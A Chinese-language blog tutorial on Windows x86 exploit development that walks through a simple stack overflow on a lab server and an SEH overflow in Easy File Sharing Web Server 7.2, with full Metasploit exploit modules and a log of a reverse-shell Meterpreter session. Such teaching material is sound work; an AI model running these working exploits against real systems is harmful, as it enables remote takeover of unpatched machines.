<!DOCTYPE html>
<html class="theme-next muse use-motion" lang="zh-Hans">
<head><meta name="generator" content="Hexo 3.8.0">
<meta charset="UTF-8">
<meta http-equiv="X-UA-Compatible" content="IE=edge">
<meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1">
<meta name="theme-color" content="#222">
<meta http-equiv="Cache-Control" content="no-transform">
<meta http-equiv="Cache-Control" content="no-siteapp">
<link href="/lib/fancybox/source/jquery.fancybox.css?v=2.1.5" rel="stylesheet" type="text/css">
<link href="/lib/font-awesome/css/font-awesome.min.css?v=4.6.2" rel="stylesheet" type="text/css">
<link href="/css/main.css?v=5.1.4" rel="stylesheet" type="text/css">
<link rel="apple-touch-icon" sizes="180x180" href="/images/hackerrank.png?v=5.1.4">
<link rel="icon" type="image/png" sizes="32x32" href="/images/hackerrank.png?v=5.1.4">
<link rel="icon" type="image/png" sizes="16x16" href="/images/hackerrank.png?v=5.1.4">
<link rel="mask-icon" href="/images/logo.svg?v=5.1.4" color="#222">
<meta name="keywords" content="二进制,Windows,漏洞,">
<meta name="description" content="这部分是对Window x86平台下的几个典型漏洞利用方式的介绍,从最基础的、没有开启任何保护的漏洞程序入手,然后开启GS,最后通过rop绕过DEP。 0x00 漏洞利用开发简介(1)需要什么 Immunity Debugger -Download Mona.py -Download Metasploit框架-下载 靶机–Windows XP sp3 函数调用与栈:调用、返回 寄存器与函">
<meta name="keywords" content="二进制,Windows,漏洞">
<meta property="og:type" content="article">
<meta property="og:title" content="x86-basic 漏洞利用">
<meta property="og:url" content="https://cool-y.github.io/2019/07/10/x86basic/index.html">
<meta property="og:site_name" content="混元霹雳手">
<meta property="og:description" content="这部分是对Window x86平台下的几个典型漏洞利用方式的介绍,从最基础的、没有开启任何保护的漏洞程序入手,然后开启GS,最后通过rop绕过DEP。 0x00 漏洞利用开发简介(1)需要什么 Immunity Debugger -Download Mona.py -Download Metasploit框架-下载 靶机–Windows XP sp3 函数调用与栈:调用、返回 寄存器与函">
<meta property="og:locale" content="zh-Hans">
<meta property="og:image" content="https://res.cloudinary.com/dozyfkbg3/image/upload/v1562741903/pwn/%E6%8D%95%E8%8E%B7.png">
<meta property="og:image" content="https://res.cloudinary.com/dozyfkbg3/image/upload/v1562742079/pwn/%E6%8D%95%E8%8E%B71.png">
<meta property="og:image" content="https://res.cloudinary.com/dozyfkbg3/image/upload/v1562742316/pwn/%E5%9B%BE%E7%89%871.png">
<meta property="og:image" content="https://res.cloudinary.com/dozyfkbg3/image/upload/v1562742366/pwn/%E5%9B%BE%E7%89%872.png">
<meta property="og:image" content="https://res.cloudinary.com/dozyfkbg3/image/upload/v1562742444/pwn/%E5%9B%BE%E7%89%873.png">
<meta property="og:image" content="https://res.cloudinary.com/dozyfkbg3/image/upload/v1562742486/pwn/%E5%9B%BE%E7%89%874.png">
<meta property="og:image" content="https://res.cloudinary.com/dozyfkbg3/image/upload/v1562742543/pwn/%E5%9B%BE%E7%89%875.png">
<meta property="og:image" content="https://res.cloudinary.com/dozyfkbg3/image/upload/v1562742622/pwn/%E5%9B%BE%E7%89%876.png">
<meta property="og:image" content="https://res.cloudinary.com/dozyfkbg3/image/upload/v1562742623/pwn/%E5%9B%BE%E7%89%877.png">
<meta property="og:image" content="https://res.cloudinary.com/dozyfkbg3/image/upload/v1562742685/pwn/%E5%9B%BE%E7%89%878.png">
<meta property="og:image" content="https://res.cloudinary.com/dozyfkbg3/image/upload/v1562742686/pwn/%E5%9B%BE%E7%89%879.png">
<meta property="og:image" content="https://res.cloudinary.com/dozyfkbg3/image/upload/v1562742794/pwn/%E5%9B%BE%E7%89%8710.png">
<meta property="og:image" content="https://res.cloudinary.com/dozyfkbg3/image/upload/v1562742793/pwn/%E5%9B%BE%E7%89%8711.png">
<meta property="og:image" content="https://res.cloudinary.com/dozyfkbg3/image/upload/v1562744120/11.png">
<meta property="og:image" content="https://res.cloudinary.com/dozyfkbg3/image/upload/v1562744240/pwn/231.png">
<meta property="og:image" content="https://res.cloudinary.com/dozyfkbg3/image/upload/v1562744461/%E5%9B%BE%E7%89%8712.png">
<meta property="og:image" content="https://res.cloudinary.com/dozyfkbg3/image/upload/v1562744518/pwn/%E6%8D%9511%E8%8E%B7.png">
<meta property="og:updated_time" content="2019-10-25T13:07:23.257Z">
<meta name="twitter:card" content="summary">
<meta name="twitter:title" content="x86-basic 漏洞利用">
<meta name="twitter:description" content="这部分是对Window x86平台下的几个典型漏洞利用方式的介绍,从最基础的、没有开启任何保护的漏洞程序入手,然后开启GS,最后通过rop绕过DEP。 0x00 漏洞利用开发简介(1)需要什么 Immunity Debugger -Download Mona.py -Download Metasploit框架-下载 靶机–Windows XP sp3 函数调用与栈:调用、返回 寄存器与函">
<meta name="twitter:image" content="https://res.cloudinary.com/dozyfkbg3/image/upload/v1562741903/pwn/%E6%8D%95%E8%8E%B7.png">
<script type="text/javascript" id="hexo.configurations">
var NexT = window.NexT || {};
var CONFIG = {
root: '/',
scheme: 'Muse',
version: '5.1.4',
sidebar: {"position":"left","display":"always","offset":12,"b2t":false,"scrollpercent":false,"onmobile":false},
fancybox: true,
tabs: true,
motion: {"enable":true,"async":false,"transition":{"post_block":"fadeIn","post_header":"slideDownIn","post_body":"slideDownIn","coll_header":"slideLeftIn","sidebar":"slideUpIn"}},
duoshuo: {
userId: '0',
author: '博主'
},
algolia: {
applicationID: '',
apiKey: '',
indexName: '',
hits: {"per_page":10},
labels: {"input_placeholder":"Search for Posts","hits_empty":"We didn't find any results for the search: ${query}","hits_stats":"${hits} results found in ${time} ms"}
}
};
</script>
<link rel="canonical" href="https://cool-y.github.io/2019/07/10/x86basic/">
<title>x86-basic 漏洞利用 | 混元霹雳手</title>
</head>
<body itemscope itemtype="http://schema.org/WebPage" lang="zh-Hans">
<div class="container sidebar-position-left page-post-detail">
<div class="headband"></div>
<header id="header" class="header" itemscope itemtype="http://schema.org/WPHeader">
<div class="header-inner"><div class="site-brand-wrapper">
<div class="site-meta ">
<div class="custom-logo-site-title">
<a href="/" class="brand" rel="start">
<span class="logo-line-before"><i></i></span>
<span class="site-title">混元霹雳手</span>
<span class="logo-line-after"><i></i></span>
</a>
</div>
<p class="site-subtitle"></p>
</div>
<div class="site-nav-toggle">
<button>
<span class="btn-bar"></span>
<span class="btn-bar"></span>
<span class="btn-bar"></span>
</button>
</div>
</div>
<nav class="site-nav">
<ul id="menu" class="menu">
<li class="menu-item menu-item-home">
<a href="/" rel="section">
<i class="menu-item-icon fa fa-fw fa-home"></i> <br>
首页
</a>
</li>
<li class="menu-item menu-item-about">
<a href="/about/" rel="section">
<i class="menu-item-icon fa fa-fw fa-user"></i> <br>
关于
</a>
</li>
<li class="menu-item menu-item-tags">
<a href="/tags/" rel="section">
<i class="menu-item-icon fa fa-fw fa-tags"></i> <br>
标签
</a>
</li>
<li class="menu-item menu-item-categories">
<a href="/categories/" rel="section">
<i class="menu-item-icon fa fa-fw fa-th"></i> <br>
分类
</a>
</li>
<li class="menu-item menu-item-archives">
<a href="/archives/" rel="section">
<i class="menu-item-icon fa fa-fw fa-archive"></i> <br>
归档
</a>
</li>
<li class="menu-item menu-item-bookmarks">
<a href="/bookmarks/" rel="section">
<i class="menu-item-icon fa fa-fw fa-map"></i> <br>
书签
</a>
</li>
<li class="menu-item menu-item-hack之外">
<a href="/hack之外/" rel="section">
<i class="menu-item-icon fa fa-fw fa-heartbeat"></i> <br>
HACK之外
</a>
</li>
</ul>
</nav>
</div>
</header>
<main id="main" class="main">
<div class="main-inner">
<div class="content-wrap">
<div id="content" class="content">
<div id="posts" class="posts-expand">
<article class="post post-type-normal" itemscope itemtype="http://schema.org/Article">
<div class="post-block">
<link itemprop="mainEntityOfPage" href="https://cool-y.github.io/2019/07/10/x86basic/">
<span hidden itemprop="author" itemscope itemtype="http://schema.org/Person">
<meta itemprop="name" content="Cool-Y">
<meta itemprop="description" content>
<meta itemprop="image" content="/images/avatar.png">
</span>
<span hidden itemprop="publisher" itemscope itemtype="http://schema.org/Organization">
<meta itemprop="name" content="混元霹雳手">
</span>
<header class="post-header">
<h1 class="post-title" itemprop="name headline">x86-basic 漏洞利用</h1>
<div class="post-meta">
<span class="post-time">
<span class="post-meta-item-icon">
<i class="fa fa-calendar-o"></i>
</span>
<span class="post-meta-item-text">发表于</span>
<time title="创建于" itemprop="dateCreated datePublished" datetime="2019-07-10T17:00:36+08:00">
2019-07-10
</time>
</span>
<span class="post-category">
<span class="post-meta-divider">|</span>
<span class="post-meta-item-icon">
<i class="fa fa-folder-o"></i>
</span>
<span class="post-meta-item-text">分类于</span>
<span itemprop="about" itemscope itemtype="http://schema.org/Thing">
<a href="/categories/Pwn/" itemprop="url" rel="index">
<span itemprop="name">Pwn</span>
</a>
</span>
</span>
<span id="/2019/07/10/x86basic/" class="leancloud_visitors" data-flag-title="x86-basic 漏洞利用">
<span class="post-meta-divider">|</span>
<span class="post-meta-item-icon">
<i class="fa fa-eye"></i>
</span>
<span class="post-meta-item-text">阅读次数:</span>
<span class="leancloud-visitors-count"></span>
</span>
<div class="post-wordcount">
<span class="post-meta-item-icon">
<i class="fa fa-file-word-o"></i>
</span>
<span title="字数统计">
2.2k 字
</span>
<span class="post-meta-divider">|</span>
<span class="post-meta-item-icon">
<i class="fa fa-clock-o"></i>
</span>
<span title="阅读时长">
12 分钟
</span>
</div>
</div>
</header>
<div class="post-body" itemprop="articleBody">
<p>这部分是对Window x86平台下的几个典型漏洞利用方式的介绍,从最基础的、没有开启任何保护的漏洞程序入手,然后开启GS,最后通过rop绕过DEP。</p>
<hr>
<h1 id="0x00-漏洞利用开发简介"><a href="#0x00-漏洞利用开发简介" class="headerlink" title="0x00 漏洞利用开发简介"></a>0x00 漏洞利用开发简介</h1><p>(1)需要什么</p>
<ul>
<li>Immunity Debugger -<a href="http://debugger.immunityinc.com/ID_register.py" target="_blank" rel="noopener">Download</a></li>
<li>Mona.py -<a href="https://github.com/corelan/mona" target="_blank" rel="noopener">Download</a></li>
<li>Metasploit框架-<a href="https://www.metasploit.com/" target="_blank" rel="noopener">下载</a></li>
<li>靶机–Windows XP sp3</li>
</ul>
<p><img src="https://res.cloudinary.com/dozyfkbg3/image/upload/v1562741903/pwn/%E6%8D%95%E8%8E%B7.png" alt></p>
<ul>
<li>函数调用与栈:调用、返回</li>
<li>寄存器与函数栈帧:ESP、EBP</li>
<li>函数栈帧:局部变量、栈帧状态值、函数返回地址</li>
<li>函数调用约定与相关指令:参数传递方式、参数入栈顺序、恢复堆栈平衡的操作</li>
</ul>
<p>(2)函数调用的汇编过程</p>
<ol>
<li><p>示例程序</p>
<figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><span class="line">charname[] = <span class="string">"1234567"</span>;</span><br><span class="line">voidfunc(<span class="keyword">int</span> a, <span class="keyword">int</span> b, <span class="keyword">int</span> c)</span><br><span class="line">{</span><br><span class="line"> charbuf[<span class="number">8</span>];</span><br><span class="line"> <span class="built_in">strcpy</span>(buf, name);</span><br><span class="line">}</span><br></pre></td></tr></table></figure>
</li>
<li><p>汇编过程</p>
</li>
</ol>
<ul>
<li>PUSH c, PUSH b, PUSH a</li>
<li>CALL address of func【保存返回地址;跳转】</li>
<li>MOV ebp, esp</li>
<li>PUSH ebp</li>
<li>SUB esp, 0x40</li>
<li>创建局部变量,4个字节为一组</li>
<li>do something</li>
<li>add esp, 0x40</li>
<li>pop ebp</li>
<li>RETN【弹出返回地址,跳转】</li>
</ul>
<ol start="3">
<li>栈帧结构<br><img src="https://res.cloudinary.com/dozyfkbg3/image/upload/v1562742079/pwn/%E6%8D%95%E8%8E%B71.png" alt></li>
</ol>
<h1 id="0x01-简单栈溢出"><a href="#0x01-简单栈溢出" class="headerlink" title="0x01 简单栈溢出"></a>0x01 简单栈溢出</h1><blockquote>
<p><strong>目标程序:</strong><br><a href="http://redstack.net/blog/static/uploads/2008/01/bof-server.c" target="_blank" rel="noopener">bof-server source code</a><br><a href="http://redstack.net/blog/wp-content/uploads/2008/01/bof-server.exe" target="_blank" rel="noopener">bof-server binary for Windows</a><br><strong>usage:</strong><br>服务端<br><code>bof-server.exe 4242</code><br>客户端<br><code>telnet localhost 4242</code><br><code>version</code><br><code>bof-server v0.01</code><br><code>quit</code></p>
</blockquote>
<h2 id="漏洞点"><a href="#漏洞点" class="headerlink" title="漏洞点"></a>漏洞点</h2><p><img src="https://res.cloudinary.com/dozyfkbg3/image/upload/v1562742316/pwn/%E5%9B%BE%E7%89%871.png" alt></p>
<p><strong>产生崩溃</strong><br>将输出的1024个A发送给靶机程序<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">python -c "print('A' * 1024)"</span><br><span class="line">telnet 192.168.64.138 4242</span><br></pre></td></tr></table></figure></p>
<p><img src="https://res.cloudinary.com/dozyfkbg3/image/upload/v1562742366/pwn/%E5%9B%BE%E7%89%872.png" alt></p>
<h2 id="关闭防御措施"><a href="#关闭防御措施" class="headerlink" title="关闭防御措施"></a>关闭防御措施</h2><p>使用<strong>PESecurity</strong>检查可执行文件本身的防御措施开启情况<br>注意设置:Set-ExecutionPolicyUnrestricted</p>
<p><img src="https://res.cloudinary.com/dozyfkbg3/image/upload/v1562742444/pwn/%E5%9B%BE%E7%89%873.png" alt></p>
<p><strong>ASLR和DEP</strong><br>ASLR在xp下不用考虑,DEP可通过修改boot.ini中的nonexecute来完成(AlwaysOff、OptOut)<br><img src="https://res.cloudinary.com/dozyfkbg3/image/upload/v1562742486/pwn/%E5%9B%BE%E7%89%874.png" alt></p>
<h2 id="整体的攻击流程"><a href="#整体的攻击流程" class="headerlink" title="整体的攻击流程"></a>整体的攻击流程</h2><ol>
<li>任意非00的指令覆盖buffer和EBP</li>
<li>从程序已经加载的dll中获取他们的jmp esp指令地址。</li>
<li>使用jmp esp的指令地址覆盖ReturnAddress</li>
<li>从下一行开始填充Shellcode<br><img src="https://res.cloudinary.com/dozyfkbg3/image/upload/v1562742543/pwn/%E5%9B%BE%E7%89%875.png" alt></li>
</ol>
<h2 id="确定溢出点的位置"><a href="#确定溢出点的位置" class="headerlink" title="确定溢出点的位置"></a>确定溢出点的位置</h2><ol>
<li><p>生成字符序列 <strong>pattern_create.rb</strong><br><img src="https://res.cloudinary.com/dozyfkbg3/image/upload/v1562742622/pwn/%E5%9B%BE%E7%89%876.png" alt></p>
</li>
<li><p>发送给目标程序<br><img src="https://res.cloudinary.com/dozyfkbg3/image/upload/v1562742623/pwn/%E5%9B%BE%E7%89%877.png" alt></p>
</li>
<li><p>计算偏移量 <strong>pattern_offset.rb</strong><br><img src="https://res.cloudinary.com/dozyfkbg3/image/upload/v1562742685/pwn/%E5%9B%BE%E7%89%878.png" alt></p>
</li>
<li><p>确定payload结构<br><img src="https://res.cloudinary.com/dozyfkbg3/image/upload/v1562742686/pwn/%E5%9B%BE%E7%89%879.png" alt></p>
</li>
</ol>
<h2 id="寻找jmp-esp跳板"><a href="#寻找jmp-esp跳板" class="headerlink" title="寻找jmp esp跳板"></a>寻找jmp esp跳板</h2><ol>
<li>OD附加进程看一下服务器加载了哪些模块<br><img src="https://res.cloudinary.com/dozyfkbg3/image/upload/v1562742794/pwn/%E5%9B%BE%E7%89%8710.png" alt></li>
<li>查找JMP ESP指令的地址<br>在这里选择了ws2_32.dll作为对象,通过Metasploit的msfbinscan进行搜索<br><img src="https://res.cloudinary.com/dozyfkbg3/image/upload/v1562742793/pwn/%E5%9B%BE%E7%89%8711.png" alt></li>
</ol>
<h2 id="自动化攻击"><a href="#自动化攻击" class="headerlink" title="自动化攻击"></a>自动化攻击</h2><figure class="highlight ruby"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">require</span> <span class="string">'msf/core'</span></span><br><span class="line"><span class="class"><span class="keyword">class</span> <span class="title">Metasploit3</span> < Msf::Exploit::<span class="title">Remote</span></span></span><br><span class="line"> Rank = NormalRanking</span><br><span class="line"> <span class="keyword">include</span> Msf::Exploit::Remote::Tcp</span><br><span class="line"></span><br><span class="line"> <span class="function"><span class="keyword">def</span> <span class="title">initialize</span><span class="params">(info = {})</span></span></span><br><span class="line"> <span class="keyword">super</span>(update_info(info,</span><br><span class="line"> <span class="string">'Name'</span> => <span class="string">'Stack Based Buffer Overflow Example'</span>,</span><br><span class="line"> <span class="string">'Description'</span> => <span class="string">%q{</span></span><br><span class="line"><span class="string"> Stack Based Overflow Example Application Exploitation Module</span></span><br><span class="line"><span class="string"> }</span>,</span><br><span class="line"> <span class="string">'Platform'</span> => <span class="string">'Windows'</span>,</span><br><span class="line"> <span class="string">'Author'</span> => <span class="string">'yanhan'</span>,</span><br><span class="line"></span><br><span class="line"> <span class="string">'Payload'</span> =></span><br><span class="line"> {</span><br><span class="line"> <span class="string">'space'</span> => <span class="number">400</span>,</span><br><span class="line"> <span class="string">'BadChars'</span> => <span class="string">"\x00\xff"</span></span><br><span class="line"> },</span><br><span class="line"> <span class="string">'Targets'</span> =></span><br><span class="line"> [</span><br><span class="line"> [</span><br><span class="line"> <span class="string">'Windows XP SP3'</span>,</span><br><span class="line"> {<span class="string">'Ret'</span> => <span class="number">0x71a22b53</span>, <span class="string">'Offset'</span> => <span class="number">520</span>}</span><br><span class="line"> ]</span><br><span class="line"> ],</span><br><span class="line"> <span class="string">'DisclosureDate'</span> => <span class="string">'2019-05-25'</span></span><br><span class="line"> ))</span><br><span class="line"> <span class="keyword">end</span></span><br><span class="line"></span><br><span class="line"> <span class="function"><span class="keyword">def</span> <span class="title">exploit</span></span></span><br><span class="line"> connect</span><br><span class="line"> buf = make_nops(target[<span class="string">'Offset'</span>])</span><br><span class="line"> buf = buf + [target[<span class="string">'Ret'</span>]].pack(<span class="string">'V'</span>) + make_nops(<span class="number">20</span>) + payload.encoded</span><br><span class="line"> sock.put(buf)</span><br><span class="line"> handler</span><br><span class="line"> disconnect</span><br><span class="line"> <span class="keyword">end</span></span><br><span class="line"><span class="keyword">end</span></span><br></pre></td></tr></table></figure>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br></pre></td><td class="code"><pre><span class="line">msf5 > use exploit/windows/yanhan/bof_attack</span><br><span class="line">msf5 exploit(windows/yanhan/bof_attack) > set rhosts 192.168.31.114</span><br><span class="line">rhosts => 192.168.31.114</span><br><span class="line">msf5 exploit(windows/yanhan/bof_attack) > set rport 1000</span><br><span class="line">rport => 1000</span><br><span class="line">msf5 exploit(windows/yanhan/bof_attack) > exploit</span><br><span class="line"></span><br><span class="line">[*] Started reverse TCP handler on 192.168.31.84:4444</span><br><span class="line">[*] Sending stage (179779 bytes) to 192.168.31.114</span><br><span class="line">[*] Meterpreter session 1 opened (192.168.31.84:4444 -> 192.168.31.114:1062) at 2019-07-10 16:38:51 +0800</span><br><span class="line"></span><br><span class="line">meterpreter > ls</span><br><span class="line">Listing: C:\Documents and Settings\Administrator</span><br><span class="line">================================================</span><br><span class="line"></span><br><span class="line">Mode Size Type Last modified Name</span><br><span class="line">---- ---- ---- ------------- ----</span><br><span class="line">40555/r-xr-xr-x 0 dir 2019-05-14 09:54:43 +0800 Application Data</span><br><span class="line">40777/rwxrwxrwx 0 dir 2019-05-14 09:54:43 +0800 Cookies</span><br><span class="line">40555/r-xr-xr-x 0 dir 2019-05-14 09:54:43 +0800 Favorites</span><br><span class="line">40777/rwxrwxrwx 0 dir 2019-05-14 09:54:43 +0800 Local Settings</span><br><span class="line">40555/r-xr-xr-x 0 dir 2019-05-14 09:54:43 +0800 My Documents</span><br><span class="line">100666/rw-rw-rw- 1048576 fil 2019-05-14 09:54:43 +0800 NTUSER.DAT</span><br><span class="line">40777/rwxrwxrwx 0 dir 2019-05-14 09:54:43 +0800 NetHood</span><br><span class="line">40777/rwxrwxrwx 0 dir 2019-05-14 09:54:43 +0800 PrintHood</span><br><span class="line">40555/r-xr-xr-x 0 dir 2019-05-14 09:54:43 +0800 Recent</span><br><span class="line">40555/r-xr-xr-x 0 dir 2019-05-14 09:54:43 +0800 SendTo</span><br><span class="line">40777/rwxrwxrwx 0 dir 2019-05-14 09:54:43 +0800 Templates</span><br><span class="line">100777/rwxrwxrwx 26665 fil 2019-05-28 14:59:10 +0800 bof-server.exe</span><br><span class="line">100666/rw-rw-rw- 1024 fil 2019-05-14 09:54:43 +0800 ntuser.dat.LOG</span><br><span class="line">100666/rw-rw-rw- 178 fil 2019-05-14 09:54:43 +0800 ntuser.ini</span><br><span class="line">40777/rwxrwxrwx 0 dir 2019-05-29 10:49:26 +0800 vulnserver</span><br><span class="line">40555/r-xr-xr-x 0 dir 2019-05-14 09:54:43 +0800 「开始」菜单</span><br><span class="line">40777/rwxrwxrwx 0 dir 2019-05-14 09:54:43 +0800 桌面</span><br><span class="line"></span><br><span class="line">meterpreter ></span><br></pre></td></tr></table></figure>
<hr>
<h1 id="0x02-基于SEH的栈溢出"><a href="#0x02-基于SEH的栈溢出" class="headerlink" title="0x02 基于SEH的栈溢出"></a>0x02 基于SEH的栈溢出</h1><blockquote>
<p><strong>目标程序</strong> Easy File Sharing Web Server 7.2</p>
<p><strong>漏洞点</strong><br>在处理请求时存在漏洞——一个恶意的请求头部(HEAD或GET)就可以引起缓冲区溢出,从而改写SEH链的地址。</p>
<p><strong>利用seh</strong><br>填充物+nseh+ seh(pop popretn指令序列地址)+shellcode</p>
<p><img src="https://res.cloudinary.com/dozyfkbg3/image/upload/v1562744120/11.png" alt></p>
</blockquote>
<h2 id="确定溢出点的位置-1"><a href="#确定溢出点的位置-1" class="headerlink" title="确定溢出点的位置"></a>确定溢出点的位置</h2><ol>
<li>生成字符序列<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">/opt/metasploit-framework/embedded/framework/tools/exploit/pattern_create.rb -l 10000 > a.txt</span><br><span class="line">python -c "print(' HTTP/1.0\r\n\r\n')" > b.txt</span><br><span class="line">cat a.txt b.txt > c.txt</span><br></pre></td></tr></table></figure>
</li>
</ol>
<p>删除cat造成的多余字符0x0a<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line">vim -bz.txt</span><br><span class="line"># In Vim</span><br><span class="line">:%!xxd</span><br><span class="line"># After editing, use the instruction below to save</span><br><span class="line">:%!xxd -r</span><br></pre></td></tr></table></figure></p>
<ol start="2">
<li>构造SEH链</li>
</ol>
<ul>
<li>将Easy File Sharing Web Server 7.2加载到ImmunityDebugger中,并处于运行状态。</li>
<li>发送溢出字符序列</li>
<li>查看Easy File Sharing Web Server 7.2溢出地址<br><img src="https://res.cloudinary.com/dozyfkbg3/image/upload/v1562744240/pwn/231.png" alt></li>
</ul>
<ol start="3">
<li>计算偏移量<br>计算catch块偏移量&计算下一条SEH记录偏移量</li>
</ol>
<h2 id="寻找PPR"><a href="#寻找PPR" class="headerlink" title="寻找PPR"></a>寻找PPR</h2><ol>
<li>使用mona寻找<br>需要POP/POP/RET指令的地址来载入下一条SEH记录的地址,并跳转到攻击载荷<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">!mona modules</span><br><span class="line">!mona seh</span><br></pre></td></tr></table></figure>
</li>
</ol>
<h2 id="自动化攻击-1"><a href="#自动化攻击-1" class="headerlink" title="自动化攻击"></a>自动化攻击</h2><ol>
<li><p>编写攻击脚本</p>
<figure class="highlight ruby"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">require</span> <span class="string">'msf/core'</span></span><br><span class="line"><span class="class"><span class="keyword">class</span> <span class="title">MetasploitModule</span> < Msf::Exploit::<span class="title">Remote</span></span></span><br><span class="line"> Rank = NormalRanking</span><br><span class="line"> <span class="keyword">include</span> Msf::Exploit::Remote::Tcp</span><br><span class="line"> <span class="keyword">include</span> Msf::Exploit::Seh</span><br><span class="line"></span><br><span class="line"> <span class="function"><span class="keyword">def</span> <span class="title">initialize</span><span class="params">(info = {})</span></span></span><br><span class="line"> <span class="keyword">super</span>(update_info(info,</span><br><span class="line"> <span class="string">'Name'</span> => <span class="string">'Easy File Sharing HTTP Server 7.2 SEH Overflow'</span>,</span><br><span class="line"> <span class="string">'Description'</span> => <span class="string">%q{</span></span><br><span class="line"><span class="string"> This Module Demonstrate SEH based overflow example</span></span><br><span class="line"><span class="string"> }</span>,</span><br><span class="line"> <span class="string">'Author'</span> => <span class="string">'yanhan'</span>,</span><br><span class="line"></span><br><span class="line"> <span class="string">'Payload'</span> =></span><br><span class="line"> {</span><br><span class="line"> <span class="string">'Space'</span> => <span class="number">390</span>,</span><br><span class="line"> <span class="string">'BadChars'</span> => <span class="string">"\x00\x7e\x2b\x26\x3d\x25\x3a\x22\x0a\x0d\x20\x2f\x5c\x2e"</span></span><br><span class="line"> },</span><br><span class="line"> <span class="string">'Platform'</span> => <span class="string">'Windows'</span>,</span><br><span class="line"> <span class="string">'Targets'</span> =></span><br><span class="line"> [</span><br><span class="line"> [</span><br><span class="line"> <span class="string">'Easy File Sharing 7.2 HTTP'</span>,</span><br><span class="line"> {</span><br><span class="line"> <span class="string">'Ret'</span> => <span class="number">0x10022fd7</span>,</span><br><span class="line"> <span class="string">'Offset'</span> => <span class="number">4061</span></span><br><span class="line"> }</span><br><span class="line"> ]</span><br><span class="line"> ],</span><br><span class="line"> <span class="string">'DisclosureDate'</span> => <span class="string">'2019-01-16'</span>,</span><br><span class="line"> ))</span><br><span class="line"> <span class="keyword">end</span></span><br><span class="line"></span><br><span class="line"> <span class="function"><span class="keyword">def</span> <span class="title">exploit</span></span></span><br><span class="line"> connect</span><br><span class="line"> weapon = <span class="string">"HEAD "</span></span><br><span class="line"> weapon << make_nops(target[<span class="string">'Offset'</span>])</span><br><span class="line"> weapon << generate_seh_record(target[<span class="string">'Ret'</span>])</span><br><span class="line"> weapon << make_nops(<span class="number">20</span>)</span><br><span class="line"> weapon << payload.encoded</span><br><span class="line"> weapon << <span class="string">" HTTP/1.0\r\n\r\n"</span></span><br><span class="line"> sock.put(weapon)</span><br><span class="line"> handler</span><br><span class="line"> disconnect</span><br><span class="line"> <span class="keyword">end</span></span><br><span class="line"><span class="keyword">end</span></span><br></pre></td></tr></table></figure>
</li>
<li><p>exploit</p>
